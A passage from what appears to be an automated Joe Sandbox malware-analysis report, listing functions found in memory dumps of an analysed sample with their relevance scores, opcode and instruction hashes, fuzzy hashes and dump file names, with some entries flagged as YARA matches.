                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,
                                                            • API String ID: 0-3772416878
                                                            • Opcode ID: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
                                                            • Instruction ID: 62e55cec2c7aa6ee553f3dc249263ddf140417a2f99c44964cbc50152af1cc54
                                                            • Opcode Fuzzy Hash: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
                                                            • Instruction Fuzzy Hash: B8B13871249381AFD314CF68C84475ABBE5AF9A308F444A1DF49897382C771EA58CB96
                                                            Function 00436670 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"
                                                            • API String ID: 0-2098420348
                                                            • Opcode ID: bdaaa64c88ca6c27d57d293b1ce7708b8987770468373f954532dd24f85ec2ff
                                                            • Instruction ID: f7e06bb7343a789ad0a08b08bc7e5896dfb3b66a2a1c14d4cc0749131caaa646
                                                            • Opcode Fuzzy Hash: bdaaa64c88ca6c27d57d293b1ce7708b8987770468373f954532dd24f85ec2ff
                                                            • Instruction Fuzzy Hash: 5281F374A0D2525BC319CF28C49062EFBE2AFD9314F1AD67EE4E54B392C638D805CB56
                                                            Function 021768D7 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"
                                                            • API String ID: 0-2098420348
                                                            • Opcode ID: 2fc314b888fb0116938f773e0c649572fcb4f9e9823d8a26cea8d83fd9cf3a08
                                                            • Instruction ID: 317790922b1450604d63a34485ca8fbb703461044447cad82e285c6b5942decf
                                                            • Opcode Fuzzy Hash: 2fc314b888fb0116938f773e0c649572fcb4f9e9823d8a26cea8d83fd9cf3a08
                                                            • Instruction Fuzzy Hash: 5381BFB16486928FC729CE28C49062EFBF6AFD6214F19866DE4E54B392C734D845CB42
                                                            Function 0041CCD0 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452
                                                            • API String ID: 0-87867774
                                                            • Opcode ID: 5c1e0b948c35acd900ddb97ff7b0f3bedf9caa5bb25f7f18d77543825d300cf8
                                                            • Instruction ID: 1067625b523eb8300719b926f48d8486b81893701fcfb7bf3f689dc49be56a81
                                                            • Opcode Fuzzy Hash: 5c1e0b948c35acd900ddb97ff7b0f3bedf9caa5bb25f7f18d77543825d300cf8
                                                            • Instruction Fuzzy Hash: C251ACB9548301DBE3048F14ED9076BB7E5FB8A318F44496DE98593390D778E840CBAA
                                                            Function 00423931 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb
                                                            • API String ID: 0-1935535308
                                                            • Opcode ID: 7a44b362ac63075c833ecc283955e542d92d7f5d633f3448bfc3db36f53db2fa
                                                            • Instruction ID: d4aa4b60c4f404011ded0bfc51642dd63f19c3ddecb79c10eafa6cd19f5c7a0d
                                                            • Opcode Fuzzy Hash: 7a44b362ac63075c833ecc283955e542d92d7f5d633f3448bfc3db36f53db2fa
                                                            • Instruction Fuzzy Hash: E8217AB42156009BD7288F14D5A173B73B2BB86306F94195DD48307F91C779AA829B98
                                                            Function 02163B98 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb
                                                            • API String ID: 0-1935535308
                                                            • Opcode ID: b6e695a08ef51802b35434ef0fb818b6e5709b89da12649de45031fd7ed8f489
                                                            • Instruction ID: bbc4223f83ccf6f045cd47effcf2cc4fe9de302917417462aa3826183d0f5ea8
                                                            • Opcode Fuzzy Hash: b6e695a08ef51802b35434ef0fb818b6e5709b89da12649de45031fd7ed8f489
                                                            • Instruction Fuzzy Hash: CE21BB742907028FD7389F14C4A9B3AB7A3FB81B04F58199CE4A307E91C775E452CB90
                                                            Function 02162D5B Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb
                                                            • API String ID: 0-1935535308
                                                            • Opcode ID: 39845d32d828b44f1a01f395a394bdf9b5f869be6926a6d7d22a8d0d447bb435
                                                            • Instruction ID: 1d9358f1b0432df54459d6811c87e0db5fd24b37cc1cf58a1425f52dcad0dddd
                                                            • Opcode Fuzzy Hash: 39845d32d828b44f1a01f395a394bdf9b5f869be6926a6d7d22a8d0d447bb435
                                                            • Instruction Fuzzy Hash: 922125742483809BD718CF04C5E4B6FB7E2BFC5708F64992CE8891B651C736D812DB82
                                                            Function 00422AFB Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb
                                                            • API String ID: 0-1935535308
                                                            • Opcode ID: 7a72662ce85abd495c93b74e8fedf65068ba62353161d4912cf2ccd350f2e7c8
                                                            • Instruction ID: cfbb71919b36defe00f02a2a2c25438a224e3326f250cf6f214dc5f0775f29cc
                                                            • Opcode Fuzzy Hash: 7a72662ce85abd495c93b74e8fedf65068ba62353161d4912cf2ccd350f2e7c8
                                                            • Instruction Fuzzy Hash: D6211674208251ABD714CF04D6E0B6BBBE2BBC9704F94991DE8891B651C779AC02DB86
                                                            Function 02173E13 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb
                                                            • API String ID: 0-1935535308
                                                            • Opcode ID: ab5ee23c0b9e442faf849c712f13f6a41f9d170253165c2487e789b6040976a7
                                                            • Instruction ID: 37bbc40701ecefd144fd89a131a2c38b8b43b4fe69518b172b5807bb74356190
                                                            • Opcode Fuzzy Hash: ab5ee23c0b9e442faf849c712f13f6a41f9d170253165c2487e789b6040976a7
                                                            • Instruction Fuzzy Hash: D6112C74644B418BE724CF15C4A0B7BB7F2FF89314F64495CC4AA07AA1CB31A445DB54
                                                            Function 00415AFA Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2
                                                            • API String ID: 0-450215437
                                                            • Opcode ID: 30833ff814b8c550cf3d9a8c0408ccefebf08e62d8a20c99812e318a41ab620f
                                                            • Instruction ID: f5e089a6dac0a0523a871d18e63b6fe0fba65fab962518bccecdf147c50fc5da
                                                            • Opcode Fuzzy Hash: 30833ff814b8c550cf3d9a8c0408ccefebf08e62d8a20c99812e318a41ab620f
                                                            • Instruction Fuzzy Hash: A82132715183408FD308CF18C8A075BFBF1AB86308F19592EE591A7281C779DA098B8A
                                                            Function 02155D61 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2
                                                            • API String ID: 0-450215437
                                                            • Opcode ID: 30833ff814b8c550cf3d9a8c0408ccefebf08e62d8a20c99812e318a41ab620f
                                                            • Instruction ID: 03e917f146de3066abf54bd1d9813ef4dfab83d11a5e37690ec83f169bf51ea8
                                                            • Opcode Fuzzy Hash: 30833ff814b8c550cf3d9a8c0408ccefebf08e62d8a20c99812e318a41ab620f
                                                            • Instruction Fuzzy Hash: 9B2135715583408FD308CF18C89075BFBF1BB86308F195D2DE99197341C779CA098B8A
                                                            Function 00407DF0 Relevance: .8, Instructions: 810COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bcaaaa898dd430405192f2593a8c242fff0d109662e9fcd9ac7c861191fe7673
                                                            • Instruction ID: 6883325afc6f825635d626742d0a5d9e1835ed6dfc3da3a146eba26840d269f7
                                                            • Opcode Fuzzy Hash: bcaaaa898dd430405192f2593a8c242fff0d109662e9fcd9ac7c861191fe7673
                                                            • Instruction Fuzzy Hash: 2342E331608B128BC725DF18C98027BB3E1FFD4305F558A3ED9C5972C5EB39A8558B8A
                                                            Function 02148057 Relevance: .8, Instructions: 810COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 85ad772fdc6384602ed72c736a1f825d3259b273080c1fcaf1cc121491fd9706
                                                            • Instruction ID: 656ede4f098c2f95dc8b8832806f04f4a068571c18574391540658f2ca7e1ad7
                                                            • Opcode Fuzzy Hash: 85ad772fdc6384602ed72c736a1f825d3259b273080c1fcaf1cc121491fd9706
                                                            • Instruction Fuzzy Hash: 3842F2316487128BC325DF18CC8477AB3E1FFC5319F5A4A2DD99A87284EB34E455CB86
                                                            Function 00403570 Relevance: .7, Instructions: 660COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89feb02c88a3de01d02269429ed4381ee90b1f5baaa96f21f345802269d3b6f1
                                                            • Instruction ID: 12ad13480746c7cd18da11643994ea6d24d17646db99f27e8a3fd19327f066d4
                                                            • Opcode Fuzzy Hash: 89feb02c88a3de01d02269429ed4381ee90b1f5baaa96f21f345802269d3b6f1
                                                            • Instruction Fuzzy Hash: 0752AD715087418FC725CF29C08066BFBF5BF89315F148A6EE4CAA7391D738AA49CB49
                                                            Function 021437D7 Relevance: .7, Instructions: 660COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89feb02c88a3de01d02269429ed4381ee90b1f5baaa96f21f345802269d3b6f1
                                                            • Instruction ID: 6010902a36c79583d2a4bbe09cccf890196fa761171fe90ff39a6af0fbc949cb
                                                            • Opcode Fuzzy Hash: 89feb02c88a3de01d02269429ed4381ee90b1f5baaa96f21f345802269d3b6f1
                                                            • Instruction Fuzzy Hash: 5552AC715087818FC329CF29C09066AFBE1BF98318F188AADE4EE97751DB35B945CB41
                                                            Function 004061F0 Relevance: .5, Instructions: 497COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb6bcd8756247e21f10be321729ab67892ae25bb834ccd5da0f3742629e4430c
                                                            • Instruction ID: d194efcc7ec7f4bd8fb84d2a24612c42db67142ebe129ef736fceb66be316be6
                                                            • Opcode Fuzzy Hash: eb6bcd8756247e21f10be321729ab67892ae25bb834ccd5da0f3742629e4430c
                                                            • Instruction Fuzzy Hash: EE02C6356083508FCB14CF18C88075BBBE2EFD5304F09886EF8899B396DA79D915CB96
                                                            Function 02146457 Relevance: .5, Instructions: 497COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08b9dd238d8b45db2c247207ea78a481bf30ebad98789595c48e03aa40325cd9
                                                            • Instruction ID: ab8aa7279c1645aa012c4d627ea85afc8c7156e45baeed220ec1f5740c03c266
                                                            • Opcode Fuzzy Hash: 08b9dd238d8b45db2c247207ea78a481bf30ebad98789595c48e03aa40325cd9
                                                            • Instruction Fuzzy Hash: 0F02D4356483908FCB18CF18C89075ABBE6EFC9308F09986DE8898B355DB75D945CB92
                                                            Function 00421580 Relevance: .5, Instructions: 482COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07c576541fe366b73058be98e57c9bd2b12a3f8f82329be4f0b16747cfe1dd5b
                                                            • Instruction ID: 31c391565f000c2012c2e3157033306ea0d16efeb7ed1c8cee23eccb8bc6ddc9
                                                            • Opcode Fuzzy Hash: 07c576541fe366b73058be98e57c9bd2b12a3f8f82329be4f0b16747cfe1dd5b
                                                            • Instruction Fuzzy Hash: B902CCB4204B41CFC3208F29D890722BBF1BF5A305F18896DD58A8BB62D739F945CB95
                                                            Function 004089A0 Relevance: .4, Instructions: 398COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1cd7f54ce061a9ddafa4a214ace33e3eee76432edc0a9e8e077a74da1f6b516b
                                                            • Instruction ID: da991093c7ac858ecdfb44603c9bd26de7c8ee4ba14a14c77b9ecd73924d3886
                                                            • Opcode Fuzzy Hash: 1cd7f54ce061a9ddafa4a214ace33e3eee76432edc0a9e8e077a74da1f6b516b
                                                            • Instruction Fuzzy Hash: 9FD11B72F087514BC3148E29C980257BBE2AFD5320F29862EE8D9673D6DA7C9C458BC5
                                                            Function 02148C07 Relevance: .4, Instructions: 398COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1cd7f54ce061a9ddafa4a214ace33e3eee76432edc0a9e8e077a74da1f6b516b
                                                            • Instruction ID: a9af3a7992e28804527ad3c23b4734ba7f830063aed9ab02e62b9f166fac4cf3
                                                            • Opcode Fuzzy Hash: 1cd7f54ce061a9ddafa4a214ace33e3eee76432edc0a9e8e077a74da1f6b516b
                                                            • Instruction Fuzzy Hash: 0DD13B72E483524BC3148E28CCD035BBBD7ABC5624F2B8A19D8EC67395DB799C058BC1
                                                            Function 004102B2 Relevance: .3, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ceb3a9039a7e6e79f1b06a6bcad479347d8d9957a5cee3c326a915ae843bccb
                                                            • Instruction ID: 19774dfa9ffd53452cd0f78b2a7fa6416411b38c3c6d0e634cb70a42d69f586e
                                                            • Opcode Fuzzy Hash: 3ceb3a9039a7e6e79f1b06a6bcad479347d8d9957a5cee3c326a915ae843bccb
                                                            • Instruction Fuzzy Hash: 5781C3719087828FC725CF14C8907AFB7E1BF99304F08592DE899C7391E7789885CB96
                                                            Function 02150519 Relevance: .3, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea0677f270df709b1f7eb94a631cbec65cf770ef0d0ccab117a7daa6e435e835
                                                            • Instruction ID: 108c6d3dcadcb8a627c5b1dabe3c84d4269efae023d7f46376c982b596c6652a
                                                            • Opcode Fuzzy Hash: ea0677f270df709b1f7eb94a631cbec65cf770ef0d0ccab117a7daa6e435e835
                                                            • Instruction Fuzzy Hash: BF81B171558392CFD725CF24C890BAFB7E1BF89304F08596CD8A9C7281EB799845CB92
                                                            Function 00433480 Relevance: .2, Instructions: 193COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: acfbc8068afc6b7d88dba9d73b7b1bf6863cfdde9a5a5678ccf86eeeb0158c18
                                                            • Instruction ID: 8011320ac73b754884be16ecadefcb7f33d37dbd2e6123a62891b597907d0779
                                                            • Opcode Fuzzy Hash: acfbc8068afc6b7d88dba9d73b7b1bf6863cfdde9a5a5678ccf86eeeb0158c18
                                                            • Instruction Fuzzy Hash: 40617CB16087549FE314DF29D49435BBBE1BBC8318F044A2EE4D987390E379DA088B96
                                                            Function 021736E7 Relevance: .2, Instructions: 193COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: acfbc8068afc6b7d88dba9d73b7b1bf6863cfdde9a5a5678ccf86eeeb0158c18
                                                            • Instruction ID: c4701c406d195e88a16d71d1abda30ebf247825d3da95fbfec8d23a8e87b1855
                                                            • Opcode Fuzzy Hash: acfbc8068afc6b7d88dba9d73b7b1bf6863cfdde9a5a5678ccf86eeeb0158c18
                                                            • Instruction Fuzzy Hash: 81614BB1A087548FE314DF29D89475BBBE1BBC8318F144A2DE5E987390E379D5088F92
                                                            Function 02162067 Relevance: .2, Instructions: 188COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c20bdc7a851645dbf9dab95978a4bc77b7dd27bd65b083cf309054b351127529
                                                            • Instruction ID: 8d31776b54d2a30541e7e18db25a1692bdecdf94dacd26016d6d695dd19e25f0
                                                            • Opcode Fuzzy Hash: c20bdc7a851645dbf9dab95978a4bc77b7dd27bd65b083cf309054b351127529
                                                            • Instruction Fuzzy Hash: CC517E716087418FC718CF28C89063EB7E1BBC9324F154A2DE9EA97395D734E915CB52
                                                            Function 00414660 Relevance: .2, Instructions: 182COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83073b8719d7e0faf081a3368ce39582620720279ac6267d65c12e9389d1ea24
                                                            • Instruction ID: ac486eaa269052dcc2a7b9b78249461c6c086f42b689fd4a8c42a324ff056cec
                                                            • Opcode Fuzzy Hash: 83073b8719d7e0faf081a3368ce39582620720279ac6267d65c12e9389d1ea24
                                                            • Instruction Fuzzy Hash: F351F5B29186148FC720DF28CC857BAB7E4DF92318F09552ED869C7381E739D884C7A5
                                                            Function 021548C7 Relevance: .2, Instructions: 182COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44613b4c036b2c385d58573518babc9526f5992cc62a53f54369211b96f0fe89
                                                            • Instruction ID: 384ef8c022e1553771f2c4359f0c12beb3c260e481c0c225c7863c287e8c5261
                                                            • Opcode Fuzzy Hash: 44613b4c036b2c385d58573518babc9526f5992cc62a53f54369211b96f0fe89
                                                            • Instruction Fuzzy Hash: D15102B6948224CFDB20DF28CC8577AB7E4AF45314F0956A8ECAAC7281E735D584C791
                                                            Function 0040F400 Relevance: .1, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69970d3ec877a5501d78b087801963f1341c5ba9f32c0b280cd2124785c4c6f8
                                                            • Instruction ID: 93780d2427e093b758c14c50eb40fe151429752d83b3daa3d484dd8a41c19c98
                                                            • Opcode Fuzzy Hash: 69970d3ec877a5501d78b087801963f1341c5ba9f32c0b280cd2124785c4c6f8
                                                            • Instruction Fuzzy Hash: 1241247160C2615FE3189E39C89037ABBD2DBC5354F04CA7EE4E9877D2D638884ADB45
                                                            Function 0214F667 Relevance: .1, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69970d3ec877a5501d78b087801963f1341c5ba9f32c0b280cd2124785c4c6f8
                                                            • Instruction ID: c25c8bd5cf0d6a5d6d6b077234904f4a9c13e8c960fc686f71850b964ac6250c
                                                            • Opcode Fuzzy Hash: 69970d3ec877a5501d78b087801963f1341c5ba9f32c0b280cd2124785c4c6f8
                                                            • Instruction Fuzzy Hash: D541E3756082614FE3089A3DC8A037ABBD2EFC5354F05C66EE0E9877E5DB388446DB51
                                                            Function 00404EF0 Relevance: .1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 715d4e1a56a60a2aa537aa42d7826f17c876bdac566d208033b001f6f4d104f9
                                                            • Instruction ID: 09b51193ffce78eae9cd24ccb79c874a3196245145ede4469a31f63818c12293
                                                            • Opcode Fuzzy Hash: 715d4e1a56a60a2aa537aa42d7826f17c876bdac566d208033b001f6f4d104f9
                                                            • Instruction Fuzzy Hash: 40418CB16116058BDB58CF19C88475277E2ABC4324F18C1BAEE019F3CADB79D989CF85
                                                            Function 02145157 Relevance: .1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
